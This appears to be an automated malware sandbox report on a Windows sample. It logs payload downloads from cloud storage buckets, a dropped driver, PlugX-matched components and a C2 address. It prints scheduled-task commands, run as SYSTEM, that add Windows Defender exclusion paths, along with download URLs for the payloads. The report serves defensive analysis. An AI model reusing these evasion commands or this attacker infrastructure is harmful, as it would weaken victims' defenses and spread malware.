              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.152.240
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.152.240
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.152.240
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: ry2ihs.oss-cn-beijing.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: ynyeqf.net
              Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dll
              Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dllC:
              Source: Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txt
              Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txtC:
              Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rar
              Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rarC:
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
              Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
              Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
              Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://s.symcd.com06
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://s.symcd.com0_
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://s2.symcb.com0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://sv.symcd.com0&
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://sw.symcd.com0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
              Source: sgH8Ps.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
              Source: sgH8Ps.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: sgH8Ps.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: sgH8Ps.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
              Source: sgH8Ps.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/
              Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/##ry2ihs.oss-cn-beijing.aliyuncs.com
              Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003
              Source: 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
              Source: 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/RF
              Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif
              Source: 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif1i
              Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifa
              Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp
              Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifoss-enq
              Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif
              Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif(i
              Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif-
              Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif.i
              Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif5i
              Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif9i
              Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.gif
              Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.gif
              Source: 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/hF
              Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.dat
              Source: 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/zF
              Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownHTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.6:49946 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49991 version: TLS 1.2

              System Summary

              barindex
              Source: 6.2.sgH8Ps.exe.27e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 40.2.Twhtlb.exe.3a40000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTRMatched rule: PlugX Identifying Strings Author: Seth Hardy
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140006C95 NtAllocateVirtualMemory,6_2_0000000140006C95
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_000000014000C3F06_2_000000014000C3F0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_000000014000CC006_2_000000014000CC00
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140001A306_2_0000000140001A30
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_000000014000C2A06_2_000000014000C2A0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400022C06_2_00000001400022C0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400110F06_2_00000001400110F0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140010CF06_2_0000000140010CF0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400093006_2_0000000140009300
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_000000014000BB706_2_000000014000BB70
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140003F806_2_0000000140003F80
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400103D06_2_00000001400103D0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55DA1B86_2_00007FFDA55DA1B8
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55E02486_2_00007FFDA55E0248
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCode function: 42_2_00524AE242_2_00524AE2
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\K5YQV85\6WWeC.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Twhtlb\Twhtlb.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
              Source: 45631.exe, 00000000.00000000.2117321468.000000014001D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEasyDmsStart.exe` vs 45631.exe
              Source: 45631.exeBinary or memory string: OriginalFilenameEasyDmsStart.exe` vs 45631.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: 6.2.sgH8Ps.exe.27e0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 40.2.Twhtlb.exe.3a40000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTRMatched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12
              Source: 189atohci.sys.0.drBinary string: \Device\Driver\
              Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
              Source: classification engineClassification label: mal100.troj.evad.winEXE@65/29@8/3
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,6_2_0000000140001430
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
              Source: C:\Users\user\Documents\sgH8Ps.exeFile created: C:\Program Files (x86)\TwhtlbJump to behavior
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].datJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
              Source: C:\Users\user\Desktop\45631.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_048707
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3768:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_03
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMutant created: \Sessions\1\BaseNamedObjects\8.217.152.240:8917:Sauron
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5820:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6024:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
              Source: C:\Users\user\Documents\sgH8Ps.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCommand line argument: tbcore3.dll42_2_00521000
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCommand line argument: tbcore3.dll42_2_00521000
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCommand line argument: tbcore3U.dll42_2_00521000
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCommand line argument: tbcore3U.dll42_2_00521000
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCommand line argument: .R42_2_00522E30
              Source: 45631.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Documents\sgH8Ps.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\45631.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 45631.exeVirustotal: Detection: 37%
              Source: 45631.exeReversingLabs: Detection: 28%
              Source: Twhtlb.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: Twhtlb.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: Twhtlb.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: Twhtlb.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: Twhtlb.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: Twhtlb.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: C:\Users\user\Desktop\45631.exeFile read: C:\Users\user\Desktop\45631.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\45631.exe "C:\Users\user\Desktop\45631.exe"
              Source: unknownProcess created: C:\Users\user\Documents\sgH8Ps.exe C:\Users\user\Documents\sgH8Ps.exe
              Source: unknownProcess created: C:\Users\user\Documents\sgH8Ps.exe C:\Users\user\Documents\sgH8Ps.exe
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
